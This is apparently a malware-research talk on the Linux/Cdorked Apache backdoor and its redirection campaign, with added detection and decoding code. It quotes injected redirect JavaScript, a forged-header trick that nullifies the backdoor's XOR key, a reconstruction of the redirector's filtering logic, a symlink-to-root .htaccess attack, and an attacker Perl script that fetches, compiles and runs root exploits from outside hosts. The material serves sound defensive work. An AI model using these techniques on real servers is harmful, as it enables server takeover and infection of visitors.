Linux/CDorked

A server-side malware campaign

:~$ whoami

What is this Cdorked thing anyway?

Linux/Cdorked.A is a backdoor used by malicious actors to serve malicious content from legitimate websites.

This malware does not propagate by itself, and it does not exploit a vulnerability in any specific software.

How did this start?

Tonight

Why should you care?

Notes
  • this thing is stealthy
  • business side too: not good if you infect your own organization
  • They’ve got an httpd-privileged shell!!
    • but how did they install it? A: root

High-level description

Notes

You have to be motivated to support all these webservers

Prevalence

Lets get technical

Stealth

Notes
  • no logs is actually possible because it is not a module but a modified httpd binary, so it can bypass the logging chain
  • no hardcoded C2: as opposed to most other threats we encounter; possible because of the nature of a webserver (the operator connects in)
  • obfuscated HTTP: and these requests skip the webserver’s usual logging mechanisms

Stealth++

Found in the wild doing:

Notes
  • Languages: no redirection for Japanese, Finnish, Russian, Ukrainian, Kazakh or Belarusian visitors (Accept-Language blacklist)

Shared memory

Command channels

Two main command channels

Backdoor

backdoor.jpg
Notes

Backdoor component

Notes
  • hence the name

XOR obfuscation

import socket

# w, x, y, z: per-sample constants added to each octet of the client IP
h = headers
ip = h.get('X-Real-IP') or h.get('X-Forwarded-For') or h.get('Remote-addr')
ip = socket.inet_aton(ip)          # the four raw octets
xorkey = bytes((
    (ip[0] + w) % 256,
    (ip[1] + x) % 256,
    (ip[2] + y) % 256,
    (ip[3] + z) % 256))
command = xor_decrypt(query_string, xorkey)

Since we control X-Real-IP or X-Forwarded-For, an all-zero
(0x00000000) key can be constructed, which turns the XOR into a no-op
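The whole round trip, as an added example written for this page (Python; not code from the malware or from the authors): the key derivation above, the hex encoding of the XORed command in the query string that the redirection-control notes mention, and the forged X-Real-IP that collapses the key to 0x00000000. The constants W, X, Y, Z and the addresses are placeholders; the real per-sample values are not on the slides.

```python
import socket

# Per-sample constants the backdoor adds to each octet of the client IP.
# Placeholders chosen for this example; the real values differ per sample.
W, X, Y, Z = 0x2b, 0x7f, 0xa1, 0x13


def xor_bytes(data, key):
    """Repeating-key XOR; the same operation encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def derive_key(headers, w=W, x=X, y=Y, z=Z):
    """Key derivation as on the slide: the first client-IP header present wins
    (proxy headers before the socket address), then a constant is added to
    each octet modulo 256."""
    ip = (headers.get('X-Real-IP') or headers.get('X-Forwarded-For')
          or headers.get('Remote-addr'))
    o = socket.inet_aton(ip)
    return bytes(((o[0] + w) % 256, (o[1] + x) % 256,
                  (o[2] + y) % 256, (o[3] + z) % 256))


def zero_key_ip(w=W, x=X, y=Y, z=Z):
    """The forged X-Real-IP that cancels the constants octet by octet, so every
    key byte is 0 and the XOR layer becomes the identity."""
    return '.'.join(str((256 - c) % 256) for c in (w, x, y, z))


def encrypt_command(headers, command):
    """Operator side: XOR the command with the derived key and hex-encode it
    for the query string (the slides say the command travels hex-encoded)."""
    return xor_bytes(command, derive_key(headers)).hex()


def decrypt_command(headers, query_hex):
    """Backdoor side: undo the hex encoding, then XOR with the same key."""
    return xor_bytes(bytes.fromhex(query_hex), derive_key(headers))


if __name__ == '__main__':
    real = {'Remote-addr': '203.0.113.45'}
    print('key from peer address:', derive_key(real).hex(),
          'query:', encrypt_command(real, b'L1'))
    forged = {'X-Real-IP': zero_key_ip(), 'Remote-addr': '203.0.113.45'}
    print('forged X-Real-IP:', zero_key_ip(), 'key:', derive_key(forged).hex(),
          'query for ST:', encrypt_command(forged, b'ST'))
```

With the forged header the "encrypted" query is just the hex of the plaintext command (`ST` becomes `5354`), which is also what a defender can grep for once the constants of a sample are known.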

Backdoor quirks

Malicious payload

HTTP Location redirect

Controlling it

Command   Description
L1, D1    Load or delete the list of redirect URLs
L2, D2    Load or delete the list of blacklisted IP ranges
L3, D3    Load or delete the list of User-Agent whitelist patterns
L4, D4    Load or delete the list of User-Agent blacklist patterns
L5, D5    Load or delete the list of Referer whitelist patterns
L6, D6    Load or delete the list of blacklisted IPs
L7, D7    Load or delete the list of pages excluded from redirection
L8, D8    Load or delete the list of whitelisted IP ranges
L9, D9    Load or delete the list of Accept-Language blacklist patterns
LA, DA    Load or delete the list of whitelisted pages
ST        Print server stats
DU        Clear the list of already redirected IPs
T1        A timestamp

Notes

23 commands available to control the redirection conditions (10 load/delete pairs plus ST, DU and T1)

Staying under the radar

Not too aggressive

Only redirects victims once
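The command table and the once-per-victim rule put together, as an added example reconstructed for this page from the table above (not the malware's code): one list per L/D pair, handling of ST, DU and T1, and a decision function that refuses to redirect anything a blacklist matches, anything a non-empty whitelist does not match, and any IP already served once. Which lists are must-match and which are must-not-match, the regex matching and the demo values are this example's assumptions; the slides only name the lists.

```python
import ipaddress
import re
from dataclasses import dataclass, field


# One list per L<n>/D<n> pair in the command table. Pattern lists are regexes
# matched case-insensitively (an assumption; the slides do not say how they match).
@dataclass
class RedirectConfig:
    redirect_urls: list = field(default_factory=list)        # L1/D1
    ip_blacklist_ranges: list = field(default_factory=list)  # L2/D2  CIDR strings
    ua_whitelist: list = field(default_factory=list)         # L3/D3
    ua_blacklist: list = field(default_factory=list)         # L4/D4
    referer_whitelist: list = field(default_factory=list)    # L5/D5
    ip_blacklist: list = field(default_factory=list)         # L6/D6  single addresses
    excluded_pages: list = field(default_factory=list)       # L7/D7
    ip_whitelist_ranges: list = field(default_factory=list)  # L8/D8
    lang_blacklist: list = field(default_factory=list)       # L9/D9
    whitelisted_pages: list = field(default_factory=list)    # LA/DA


LIST_FIELDS = {'1': 'redirect_urls', '2': 'ip_blacklist_ranges', '3': 'ua_whitelist',
               '4': 'ua_blacklist', '5': 'referer_whitelist', '6': 'ip_blacklist',
               '7': 'excluded_pages', '8': 'ip_whitelist_ranges', '9': 'lang_blacklist',
               'A': 'whitelisted_pages'}


def match_any(patterns, value):
    return any(re.search(p, value or '', re.IGNORECASE) for p in patterns)


def in_ranges(ranges, ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(r, strict=False) for r in ranges)


class Redirector:
    def __init__(self, cfg=None):
        self.cfg = cfg or RedirectConfig()
        self.redirected = set()          # IPs already served once; DU empties it
        self.stats = {'hits': 0, 'redirects': 0, 'timestamp': None}

    def apply(self, command, payload=()):
        """Dispatch one of the 23 commands from the table."""
        op, which = command[:1], command[1:]
        if op in ('L', 'D') and which in LIST_FIELDS:
            setattr(self.cfg, LIST_FIELDS[which], list(payload) if op == 'L' else [])
        elif command == 'DU':
            self.redirected.clear()
        elif command == 'ST':
            return dict(self.stats, once_list=len(self.redirected))
        elif command == 'T1':
            self.stats['timestamp'] = payload   # the slide only says "a timestamp"
        else:
            raise ValueError('unknown command %r' % command)
        return None

    def decide(self, ip, path, user_agent='', referer='', accept_language=''):
        """Return the Location to send, or None to serve the page untouched."""
        c = self.cfg
        self.stats['hits'] += 1
        if not c.redirect_urls or ip in self.redirected:      # only once per victim
            return None
        if ip in c.ip_blacklist or in_ranges(c.ip_blacklist_ranges, ip):
            return None
        if c.ip_whitelist_ranges and not in_ranges(c.ip_whitelist_ranges, ip):
            return None
        if match_any(c.excluded_pages, path):
            return None
        if c.whitelisted_pages and not match_any(c.whitelisted_pages, path):
            return None
        if match_any(c.ua_blacklist, user_agent):
            return None
        if c.ua_whitelist and not match_any(c.ua_whitelist, user_agent):
            return None
        if c.referer_whitelist and not match_any(c.referer_whitelist, referer):
            return None
        if match_any(c.lang_blacklist, accept_language):
            return None
        self.redirected.add(ip)
        self.stats['redirects'] += 1
        return c.redirect_urls[(self.stats['redirects'] - 1) % len(c.redirect_urls)]


def build_demo_redirector():
    """A configuration in the spirit of what was seen in the wild: browsers only,
    arriving from a search engine, never on admin pages, and none of the
    Accept-Language values the campaign left alone. Values are constructed."""
    r = Redirector()
    r.apply('L1', ['hxxp://dcb84fc82e1f7b01.xxxxxxgsm.be/index.php'])
    r.apply('L3', [r'^Mozilla/'])
    r.apply('L4', [r'bot|crawl|spider|curl|wget|python'])
    r.apply('L5', [r'google\.|bing\.|yahoo\.'])
    r.apply('L7', [r'^/(admin|wp-admin|phpmyadmin)'])
    r.apply('L9', [r'^(ja|fi|ru|uk|kk|be)\b'])
    return r
```

Every filter is a reason to stay quiet: scanners, the site owner in the admin area, repeat visitors and excluded languages all get the real page, which is why the campaign stayed unnoticed on busy servers.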

Lastly

Redirection control mechanism

The query must have:

Notes
  • Varies per sample
  • With hex-encoded command in the query portion

Beyond Cdorked

Let’s see how the campaign we are tracking right now behaves. Do you have an idea for a cool name?

But first…

blackhole.jpg

Notes

Blackhole background

Notes
  • We believe the real server is usually hidden behind a reverse proxy on a compromised site

Redirection chain

Location: hxxp://dcb84fc82e1f7b01.xxxxxxgsm.be/index.php?j=anM9MSZudmNiaW11Zj1jY3Zja3FqdSZ0aW1lPTEzMDQxNjE4MjctMzYwNDUzNjUwJnNyYz0yMzImc3VybD13d3cuaW5mZWN0ZWRzZXJ2ZXIuY29tJnNwb3J0PTgwJmtleT0xM0Q5MDk1MCZzdXJpPS9mb3J1bS93Y2YvanMvM3JkUGFydHkvcHJvdG9hY3Vsb3VzLjEuOC4yLm1pbi5qcw==

Yes, Base64!

js=1&nvcbimuf=ccvckqju&time=1304161827-360453650&src=232&surl=www.infectedserver.com&sport=80&key=13D90950&suri=/forum/wcf/js/3rdParty/protoaculous.1.8.2.min.js
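Decoding that first hop, as an added example written for this page (not tooling from the authors): the Location header from the slide is the input, the hxxp defanging is undone, the j parameter is base64-decoded without the plus/percent decoding a query-string parser would apply, and the compromised resource named in surl/sport/suri is rebuilt. The 16-hex-character hostname-label check and the base64 tail used for the JavaScript stage are this example's constructions.

```python
import base64
import re
from urllib.parse import urlsplit, parse_qsl

# The first-hop Location header shown on the slide.
SAMPLE_LOCATION = ('hxxp://dcb84fc82e1f7b01.xxxxxxgsm.be/index.php?j='
                   'anM9MSZudmNiaW11Zj1jY3Zja3FqdSZ0aW1lPTEzMDQxNjE4MjctMzYwNDUzNjUwJnNyYz0yMzIm'
                   'c3VybD13d3cuaW5mZWN0ZWRzZXJ2ZXIuY29tJnNwb3J0PTgwJmtleT0xM0Q5MDk1MCZzdXJpPS9m'
                   'b3J1bS93Y2YvanMvM3JkUGFydHkvcHJvdG9hY3Vsb3VzLjEuOC4yLm1pbi5qcw==')

# Constructed stand-in for the truncated b64str of the JavaScript stage.
SAMPLE_JS_B64 = base64.b64encode(b'0.tds.example/sort.php').decode('ascii')

# Hostnames in this chain start with a 16-hex-character label
# (dcb84fc82e1f7b01..., ae334b05c4249f38...); matching that prefix is this
# example's heuristic, not something the slides state as a rule.
GENERATED_LABEL = re.compile(r'^[0-9a-f]{16}', re.IGNORECASE)


def refang(url):
    """The slides defang URLs as hxxp://; give urlsplit a real scheme back."""
    return re.sub(r'^hxxp(s?)://', r'http\1://', url.strip(), flags=re.IGNORECASE)


def raw_query_params(query):
    """Split the query without percent/plus decoding: a base64 blob may contain
    '+' and '/', which parse_qsl would turn into spaces or decode."""
    out = {}
    for pair in query.split('&'):
        if pair:
            k, _, v = pair.partition('=')
            out[k] = v
    return out


def decode_tds_location(location):
    """Unwrap the base64 'j' parameter the TDS receives and return its fields
    (surl/sport/suri name the compromised site, key/time the campaign)."""
    parts = urlsplit(refang(location))
    blob = raw_query_params(parts.query).get('j', '')
    blob += '=' * (-len(blob) % 4)          # restore padding if it was stripped
    inner = base64.b64decode(blob).decode('ascii', 'replace')
    return {
        'host': parts.hostname,
        'generated_label': bool(GENERATED_LABEL.match(parts.hostname or '')),
        'params': dict(parse_qsl(inner, keep_blank_values=True)),
    }


def infected_resource(params):
    """Rebuild the URL on the compromised server that the TDS was told about."""
    port = '' if params.get('sport') in ('80', '', None) else ':' + params['sport']
    return 'http://%s%s%s' % (params['surl'], port, params.get('suri', '/'))


def js_redirect_target(prefix, iflag, b64str):
    """Mirror of the first-stage JavaScript: fixed hostname prefix, the in-frame
    flag and a base64 tail glued together, so client state ends up in DNS."""
    return prefix + iflag + base64.b64decode(b64str).decode('ascii', 'replace')


if __name__ == '__main__':
    hop = decode_tds_location(SAMPLE_LOCATION)
    print(hop['host'], hop['generated_label'])
    print(infected_resource(hop['params']))
    print(js_redirect_target('hxxp://ae334b05c4249f38', '1', SAMPLE_JS_B64))
```

For incident response the surl/suri pair is the useful part: it tells you which site the visitor came from and which file on it carried the injection, straight from a proxy log of the Location headers.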

Example first javascript redirection

var iflag = "0"; if (top!=self) { iflag = "1"; };
var b64str = "MTQxNDExMzA1MDIyMjQ4M...luLmNvbS9zb3J0LnBocA==";
setTimeout ( function() {
    location.replace( "hxxp://ae334b05c4249f38" + iflag + b64dec(b64str) );
}, 280);

generated-domain.png

Notes

Why extended DNS names? Not sure, but:
  • keeps client-side state (the timestamp) in the hostname
  • the operator thinks it’s stealthy?

Example iframe injection

function gotime() { xflag=false; top.location.replace(b64dec("aHR0cDovL2FlMzM0YjA1YzQyNDlmM...
...cD94PTEzNyZ0PXRpbWVvdXQ=")); };
var timer=setTimeout("gotime()", 21000);
var ewq;
ewq=document.createElement("span");
ewq.innerHTML=b64dec("PGlmcmFtZSBzcmM9Im...1lPjxicj4=");
setTimeout(function() { document.body.insertBefore(ewq,document.body.lastChild); }, 504);
aHr...XQ= : hxxp://ae334b05c4249f38014141130...
...50222483098587bcf02fc1731aade45f74550b.somedomain.com/exit.php?x=137&t=timeout
< .. content .. >

Leading you to a blackhole exploit kit

Other devices?

Saw iPhone, iPad explicitly redirected to porn

Notes
  • monetization?

Let’s recap

You go to your favorite site

catoverflow.png

Demo

Notes

While researching this

Compare XORs

CDorked XOR SSHDoor XOR

cdorked-xor.png

sshdoor-xor.png

Quite complex server-side operation

Tracking

Tracking changes

Some numbers

info-last-hits.png

Ongoing investigation

Expect blog posts with more information soon!

How did we get there?

Notes
  • Please please send us your samples! We analyze them for free (if they are interesting)
  • added functions were actually pretty easy to spot (hash-looking names)

What can you do?

Detect it

Notes
  • the latest Cdorked version is not detected by it: the shm permissions and size changed. Working on it
  • also detectable through the long-lived outgoing TCP connection from the Apache process
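Both detection ideas from these notes as an added example written for this page (not the authors' tool): parse `ss -tnp` output for connections that an httpd worker opened itself, and `ipcs -m` output for shared memory segments owned by the web user. The ss and ipcs output, the segment sizes and the allow-list of legitimate outbound ports are constructed for the example.

```python
import re

# Constructed `ss -tnp` output for a web server (sample data for this example).
SS_SAMPLE = """\
State  Recv-Q Send-Q Local Address:Port    Peer Address:Port      Process
ESTAB  0      0      192.0.2.10:80         198.51.100.7:51822     users:(("httpd",pid=2201,fd=12))
ESTAB  0      0      192.0.2.10:443        203.0.113.9:40211      users:(("httpd",pid=2203,fd=15))
ESTAB  0      0      192.0.2.10:53044      192.0.2.5:3306         users:(("httpd",pid=2202,fd=9))
ESTAB  0      0      192.0.2.10:41766      198.51.100.77:8080     users:(("httpd",pid=2203,fd=17))
ESTAB  0      0      192.0.2.10:22         198.51.100.7:60122     users:(("sshd",pid=1299,fd=3))
"""

# Constructed `ipcs -m` output (ids and sizes are made up for the example).
IPCS_SAMPLE = """\
------ Shared Memory Segments --------
key        shmid      owner      perms      bytes      nattch     status
0x00000000 32768      root       600        4096       1
0x00000000 65536      apache     666        6291456    4
0x0052e2c1 98304      postgres   600        56623104   6
"""

WEB_PROCESSES = {'httpd', 'apache2', 'apache'}
WEB_USERS = {'apache', 'www-data', 'httpd', 'nobody'}
LISTEN_PORTS = {'80', '443'}
# Peers the site legitimately talks to (DB, cache). Site-specific; assumed here.
KNOWN_PEER_PORTS = {'3306', '5432', '11211'}

PROC_RE = re.compile(r'\(\("([^"]+)",pid=(\d+)')


def outbound_web_connections(ss_output, listen_ports=LISTEN_PORTS,
                             known_peer_ports=KNOWN_PEER_PORTS):
    """Established sockets of a web server process whose local port is not one
    it listens on: the process opened that connection itself. A worker serving
    pages has no reason to hold one for long; a reverse-connect shell does."""
    findings = []
    for line in ss_output.splitlines():
        f = line.split()
        if len(f) < 6 or f[0] != 'ESTAB':
            continue
        local, peer = f[3], f[4]
        m = PROC_RE.search(' '.join(f[5:]))
        if not m or m.group(1) not in WEB_PROCESSES:
            continue
        if local.rsplit(':', 1)[-1] in listen_ports:
            continue                                  # inbound client connection
        if peer.rsplit(':', 1)[-1] in known_peer_ports:
            continue                                  # expected backend traffic
        findings.append({'process': m.group(1), 'pid': int(m.group(2)),
                         'local': local, 'peer': peer})
    return findings


def web_user_shm(ipcs_output, web_users=WEB_USERS):
    """Shared memory segments owned by the web server user. Cdorked keeps its
    configuration in shm and a later variant changed the segment's size and
    permissions, so list every segment of the web user with its size and a
    world-writable flag and let the analyst dump it, rather than matching
    one fixed size."""
    findings = []
    for line in ipcs_output.splitlines():
        f = line.split()
        if len(f) < 6 or not f[0].startswith('0x'):
            continue
        key, shmid, owner, perms, size, nattch = f[:6]
        if owner not in web_users:
            continue
        findings.append({'shmid': int(shmid), 'owner': owner, 'perms': perms,
                         'bytes': int(size), 'nattch': int(nattch),
                         'world_writable': bool(int(perms[-1], 8) & 2)})
    return findings


if __name__ == '__main__':
    for c in outbound_web_connections(SS_SAMPLE):
        print('outbound from %(process)s[%(pid)d]: %(local)s -> %(peer)s' % c)
    for s in web_user_shm(IPCS_SAMPLE):
        print('shm %(shmid)d owner=%(owner)s perms=%(perms)s bytes=%(bytes)d' % s)
```

Run it against live output (`ss -tnp` needs root to show the owning process) and treat hits as leads: a worker with an outbound connection you cannot explain is worth a `strace -p`, and a suspicious segment can be read with its shmid for analysis before the server is touched.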

Prevent it

Verify your OS' integrity

But remember that the integrity database can be tampered with!

Notes
  • a lesser-known tool could be better
  • arguably you want to verify from a remote location

Build farms of Linux malware?

I don’t think so!

So don’t install gcc on production systems!

Notes
  • but actually, maybe they do deploy with RPMs since they are root?
  • let’s discuss this over beer :)

Other ideas

Notes
  • lets discuss this over beer :)

But why are these servers getting popped in the first place?

We don’t know…

Hypothesis

Notes
  • our industry isn’t as equipped to do server forensics
  • discuss the leaks

Escalation to root

Symlink attacks combined with

Notes
  • from FTP or httpd account
  • sucuri’s info

.htaccess

I want to read anything!

$ ln -s / /home/userX/www/root
$ cat /home/userX/www/.htaccess
Options all
DirectoryIndex Sux.html
AddType textplain .php
AddType textplain .conf
AddType textplain .sql
AddType textplain .log
AddHandler server-parsed .php
AddHandler txt .html
Require None
Satisfy Any
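A check for this .htaccess pattern, as an added example written for this page (not from the slides or from Sucuri): audit user-writable .htaccess files for the directives that make the symlink-to-/ trick work, using the file above as input. Rule names and the extension list are this example's choices.

```python
import re

# The attacker .htaccess shown on the slide, used here as sample input.
SYMLINK_HTACCESS = """\
Options all
DirectoryIndex Sux.html
AddType textplain .php
AddType textplain .conf
AddType textplain .sql
AddType textplain .log
AddHandler server-parsed .php
AddHandler txt .html
Require None
Satisfy Any
"""

# Extensions that must never be remapped to a text type or another handler
# from a user directory: the server then returns source and config files
# instead of executing or refusing them.
SENSITIVE_EXT = {'.php', '.inc', '.conf', '.sql', '.log', '.ini'}

RULES = {
    # Options All or +FollowSymLinks lets Apache follow userX's link to /;
    # a leading '-' (Options -FollowSymLinks) is the safe form and is skipped.
    'follow-symlinks': re.compile(r'^Options\b.*(?<!-)\b(All|FollowSymLinks)\b', re.IGNORECASE),
    # Both directives switch off whatever access control the admin configured.
    'auth-bypass': re.compile(r'^(Satisfy\s+Any|Require\s+None)\b', re.IGNORECASE),
}
TYPE_RE = re.compile(r'^(AddType|AddHandler)\s+(\S+)((?:\s+\.\w+)+)', re.IGNORECASE)


def audit_htaccess(text):
    """Return (rule, line_no, line) for every directive that, in a
    user-controlled .htaccess, helps read other tenants' files through a symlink."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        for rule, rx in RULES.items():
            if rx.search(line):
                findings.append((rule, no, line))
        m = TYPE_RE.match(line)
        if m and set(m.group(3).split()) & SENSITIVE_EXT:
            findings.append(('source-disclosure', no, line))
    return findings


if __name__ == '__main__':
    for rule, no, line in audit_htaccess(SYMLINK_HTACCESS):
        print('%-18s line %2d: %s' % (rule, no, line))
```

The scanner only finds the abuse; the fix is server-side. `AllowOverride None` (or a narrow `AllowOverrideList`) for user directories means Options and AddHandler cannot be changed from .htaccess at all, and `Options -FollowSymLinks +SymLinksIfOwnerMatch` means a link owned by userX pointing at a file owned by someone else is not followed.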

Privileged operations

Serialized exploitation

#! /usr/bin/perl
# Exploit tools v2.0 coded by iskorpitx (Turkish Hacker)
# valid on Linux servers
# by iskorpitx
{
system("rm *.txt");
system("wget http://www.euromedalex.org/profiles/a.c");
system("gcc a.c -o ab");
system("chmod 777 ab");
system("./ab");
system("./id");
system("wget http://www.euromedalex.org/profiles/a");
system("chmod 777 a");
system("./a");
system("id");
system("rm ab.txt");
system("wget www.cuia.net/media/ab.txt");
system("wget www.kassfm.co.ke/cache/15704.c");
system("gcc 15704.c -o 1704");
system("chmod 777 1704");
system("./1704");
system("id");
...
Notes
  • Sucuri found scripts like these on servers
  • clearly not APT-style attackers ;)

Nothing new

It’s the sheer volume of badly hosted sites that makes CDorked and this campaign what it is.

Notes
  • Not much new regarding how to secure your stuff

Community reaction to Cdorked

Tools

Notes
  • The biggest article on our blog. Coverage in:
    • Ars Technica
    • Slashdot

Special thanks

Conclusion

Questions?

Thank you!

References

Our own research

Sucuri’s

Others

3rd party tools